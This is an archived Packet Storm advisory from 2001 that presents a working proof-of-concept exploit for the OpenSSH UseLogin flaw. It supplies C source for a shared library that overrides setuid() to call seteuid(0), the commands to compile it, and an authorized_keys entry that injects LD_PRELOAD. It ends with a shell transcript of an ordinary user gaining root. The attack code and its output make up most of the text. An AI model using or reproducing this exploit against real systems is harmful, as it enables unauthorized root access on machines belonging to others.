UseLogin.txt

2001-12-09T00:00:00
ID PACKETSTORM:25515
Type packetstorm
Reporter War
Modified 2001-12-09T00:00:00

Description

                                        
                                            `--[ OpenSSH UseLogin bug proof of concept exploit ]--  
by [WaR] <war@genhex.org> / http://www.genhex.org  
  
  
--[ Intro ]--  
  
I was very curious in finding out how to exploit this problem. Although  
I don't think anyone uses this feature, I looked into the matter anyway.  
Here it goes. It was tested on the following platforms:  
- Slackware 7.1 with OpenSSH3.0p1  
- RedHat 7.1 with OpenSSH_2.9p2  
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)  
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)  
The exploit should work as long as UseLogin does. YMMV.  
  
This is based on libroot from squidge@onyx.infonexus.com,  
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and  
you thought it wouldn't happen again...).   
  
Kudos to pmsac@toxyn.org for his help figuring out the problem with   
the Slackware UseLogin, testing on OpenBSD, and giving the ideia for  
the seteuid(0) (it originally was a system("/bin/sh");).  
  
  
--[ Code ]--   
  
Create a lib.c file with the next content:  
  
---8<---  
#include <stdio.h>  
int setuid(int uid){  
printf("setuid() called...\n");  
seteuid(0);  
}  
---8<---  
  
Compile it into a library:  
gcc -c -o lib.o lib.c  
ld -shared -o libroot.so lib.o  
chmod 755 ./libroot.so  
  
  
Now, for the tricky (*g*) part...  
  
You must have an account on the machine, and create an entry  
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:  
  
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>  
  
When sshd receives your connection, it will export this variable  
into the environment *BEFORE* running login. Somewhere after this,  
it executes a setuid. When it does, it makes a seteuid(0).  
  
$ id  
uid=1000(war) gid=100(users) groups=100(users)  
$ ssh war@localhost  
Enter passphrase for key '/home/war/.ssh/id_dsa':  
sh-2.04# id  
uid=0(root) gid=100(users) groups=100(users)  
  
  
It also works remotely. Anyway, you _MUST_ have an account on  
the victim machine so you can setup the enviroment, and login.  
And obviously (duh) it must have UseLogin enabled.  
  
That's all.  
  
  
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.   
  
  
-- [WaR]  
"If you can't hack it, hit it with a hammer"  
`